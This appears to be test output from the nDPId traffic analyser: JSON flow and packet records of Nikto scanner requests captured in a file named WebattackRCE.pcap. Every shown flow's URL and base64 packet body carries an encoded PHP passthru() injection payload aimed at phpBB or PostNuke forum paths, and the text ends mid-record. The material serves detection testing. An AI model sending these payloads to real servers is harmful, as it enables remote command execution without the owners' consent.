+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7560000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":1,"flow_last_seen":1576420277747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":377,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":377,"pkt_l4_len":343,"thread_ts_msec":1576420277747,"pkt":"AAAAAAAAAAAAAAAACABFAAFrmeBAAEAGoap\/AAABfwAAAcayH5AmkqDEx1CXDIAYAED\/XwAAAQEICp1m\/xudZv8bR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7560000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7560000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":1,"flow_last_seen":1576420277749,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"thread_ts_msec":1576420277749,"pkt":"AAAAAAAAAAAAAAAACABFAAFlinpAAEAGsRZ\/AAABfwAAAca0H5BJbLNma4SLi4AYAED\/WQAAAQEICp1m\/x2dZv8dR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7560000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277750,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":1,"flow_last_seen":1576420277750,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277750,"pkt":"AAAAAAAAAAAAAAAACABFAAFjJWNAAEAGFjB\/AAABfwAAAca2H5CBThx9EGPplIAYAED\/VwAAAQEICp1m\/x6dZv8eR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277750,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277752,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":1,"flow_last_seen":1576420277752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277752,"pkt":"AAAAAAAAAAAAAAAACABFAAFjNwZAAEAGBI1\/AAABfwAAAca4H5DKtQ4b91nN3YAYAED\/VwAAAQEICp1m\/yCdZv8gR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277752,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7560000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277753,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":1,"flow_last_seen":1576420277753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":364,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":364,"pkt_l4_len":330,"thread_ts_msec":1576420277753,"pkt":"AAAAAAAAAAAAAAAACABFAAFeFwdAAEAGJJF\/AAABfwAAAca6H5C+9y4cicj8j4AYAED\/UgAAAQEICp1m\/yGdZv8hR0VUIC9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7560000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277753,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":1,"flow_last_seen":1576420277754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277754,"pkt":"AAAAAAAAAAAAAAAACABFAAFnn4NAAEAGnAt\/AAABfwAAAca8H5BO76agHBQLN4AYAED\/WwAAAQEICp1m\/yKdZv8iR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="} +01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":1,"flow_last_seen":1576420277756,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277756,"pkt":"AAAAAAAAAAAAAAAACABFAAFsUT9AAEAG6kp\/AAABfwAAAca+H5B2qmgj3lZSb4AYAED\/YAAAAQEICp1m\/ySdZv8kR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":1,"flow_last_seen":1576420277758,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277758,"pkt":"AAAAAAAAAAAAAAAACABFAAFmwkJAAEAGeU1\/AAABfwAAAcbAH5DScvtgYIpbaYAYAED\/WgAAAQEICp1m\/yadZv8mR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCg0K"} +01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":1,"flow_last_seen":1576420277760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277760,"pkt":"AAAAAAAAAAAAAAAACABFAAFkSaBAAEAG8fF\/AAABfwAAAcbCH5CzknC\/qWQ1toAYAED\/WAAAAQEICp1m\/yidZv8oR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="} +01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 